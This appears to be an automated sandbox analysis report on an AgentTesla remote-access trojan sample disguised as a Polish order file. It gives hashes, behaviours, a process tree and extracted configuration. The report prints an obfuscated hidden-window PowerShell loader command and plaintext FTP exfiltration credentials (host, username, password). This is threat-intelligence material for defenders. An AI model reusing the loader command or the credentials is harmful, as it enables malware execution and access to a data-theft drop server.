Analysis
-
max time kernel
143s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-10-2024 16:06
Static task
static1
Behavioral task
behavioral1
Sample
Zamówienie_5788497443000130096333.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Zamówienie_5788497443000130096333.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Sakset.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Sakset.ps1
Resource
win10v2004-20241007-en
General
-
Target
Zamówienie_5788497443000130096333.exe
-
Size
443KB
-
MD5
e48da20cb37e235145461d1ef93d560e
-
SHA1
cbea11aeb4c0ce13c251b5f9bf13560882602a9b
-
SHA256
f1a872932afe6964f188d3ddd0f2c2dfa639bfcdfd1baff74bdcd5eca8f815c9
-
SHA512
276d051174944b9fca11e21db397fb462296d870faf11fc41b57335acddf475f641df74f4ffadeeb38a014ee1819ad185ad08f3d16d62aeb73d456332ade56a0
-
SSDEEP
6144:NqC56ALcmpQFbVySc2pMOooOZFC7PPH9OvuGnzH6JOSOs+VrPfh8RBq/q4+96YJ0:KA9WL5c2pE8PHZGT64P5aRIle5FVaFzf
Malware Config
Extracted
Protocol: ftp- Host:
ftp.carbognin.it - Port:
21 - Username:
[email protected] - Password:
59Cif8wZUH#X
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.carbognin.it - Port:
21 - Username:
[email protected] - Password:
59Cif8wZUH#X
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4456 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation Zamówienie_5788497443000130096333.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 21 5028 msiexec.exe 23 5028 msiexec.exe 25 5028 msiexec.exe 38 5028 msiexec.exe 39 5028 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 5028 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4456 powershell.exe 5028 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\o.pri Zamówienie_5788497443000130096333.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\Bitings235\restqfr.sta Zamówienie_5788497443000130096333.exe File opened for modification C:\Windows\resources\0409\vampirism\discomposed.ini Zamówienie_5788497443000130096333.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Zamówienie_5788497443000130096333.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4456 powershell.exe 4456 powershell.exe 4456 powershell.exe 4456 powershell.exe 4456 powershell.exe 4456 powershell.exe 4456 powershell.exe 5028 msiexec.exe 5028 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4456 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4456 powershell.exe Token: SeIncreaseQuotaPrivilege 4456 powershell.exe Token: SeSecurityPrivilege 4456 powershell.exe Token: SeTakeOwnershipPrivilege 4456 powershell.exe Token: SeLoadDriverPrivilege 4456 powershell.exe Token: SeSystemProfilePrivilege 4456 powershell.exe Token: SeSystemtimePrivilege 4456 powershell.exe Token: SeProfSingleProcessPrivilege 4456 powershell.exe Token: SeIncBasePriorityPrivilege 4456 powershell.exe Token: SeCreatePagefilePrivilege 4456 powershell.exe Token: SeBackupPrivilege 4456 powershell.exe Token: SeRestorePrivilege 4456 powershell.exe Token: SeShutdownPrivilege 4456 powershell.exe Token: SeDebugPrivilege 4456 powershell.exe Token: SeSystemEnvironmentPrivilege 4456 powershell.exe Token: SeRemoteShutdownPrivilege 4456 powershell.exe Token: SeUndockPrivilege 4456 powershell.exe Token: SeManageVolumePrivilege 4456 powershell.exe Token: 33 4456 powershell.exe Token: 34 4456 powershell.exe Token: 35 4456 powershell.exe Token: 36 4456 powershell.exe Token: SeDebugPrivilege 5028 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3376 wrote to memory of 4456 3376 Zamówienie_5788497443000130096333.exe 86 PID 3376 wrote to memory of 4456 3376 Zamówienie_5788497443000130096333.exe 86 PID 3376 wrote to memory of 4456 3376 Zamówienie_5788497443000130096333.exe 86 PID 4456 wrote to memory of 5028 4456 powershell.exe 89 PID 4456 wrote to memory of 5028 4456 powershell.exe 89 PID 4456 wrote to memory of 5028 4456 powershell.exe 89 PID 4456 wrote to memory of 5028 4456 powershell.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\Zamówienie_5788497443000130096333.exe"C:\Users\Admin\AppData\Local\Temp\Zamówienie_5788497443000130096333.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Ossarium=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\deciliteren\afstnings\Sakset.Res';$storvasks=$Ossarium.SubString(53865,3);.$storvasks($Ossarium)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\syswow64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5028
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
384KB
MD5f7b79f20da870295dcf5c0d90de0cb35
SHA1c4f337acfe38c8fc9a3fcccdb2e81168595a1c31
SHA2561fb8978038edaf50e460ec211ad0faa2277b76be6bae3748f33b5e103b6462ac
SHA512b671238abe89bf7fd4c34c339bd3594d420b90d73fc1aba6131c663217c5acdc15ddfb27969a55e7ad320d63be5854df8b81ddeca5fe79eb6e7134f7e62f1f5b
-
Filesize
52KB
MD587d2841aab88bd011520d4b98298992f
SHA1cbdf74d62edcca1c96f44929c396383a405252f8
SHA256158c5134e2910f62d058a85124b81070ba5953276b7a0354ecb5fcc20db58b95
SHA51298d6af4ebafdd61012e0e8daf6c73526e016783f710bda0a17be859d9e9bf7411e914ff531d93b276f206713d47612a252d5bf27329044f8c7fb1a096311a603